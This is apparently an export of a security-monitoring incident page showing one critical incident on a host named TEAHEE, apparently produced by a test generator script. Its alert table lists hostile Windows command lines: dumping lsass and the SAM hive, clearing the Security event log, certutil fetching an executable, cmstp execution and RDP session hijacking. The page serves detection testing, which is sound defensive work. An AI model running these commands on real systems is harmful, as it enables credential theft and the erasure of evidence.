Back to list
Critical CINC-20251220-78688A16 new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8660232869
Incident Overview
Incident ID
CINC-20251220-78688A16
Severity
Critical (90)
Status
new
Alert Count
8
Host Count
1
Timeline
First Seen
2025-12-18 10:57:39
Last Seen
2025-12-18 10:58:54
Duration
0d 0h 1m
Created
2025-12-20 13:23
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (8)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| High | new | TEAHEE | Defense Evasion | cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf | 12-18 10:58 | |
| High | new | TEAHEE | Command and Control | certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe | 12-18 10:58 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-18 10:58 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv | 12-18 10:58 | |
| High | new | TEAHEE | Lateral Movement | C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0" | 12-18 10:58 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" | 12-18 10:58 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp" | 12-18 10:58 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-18 10:57 |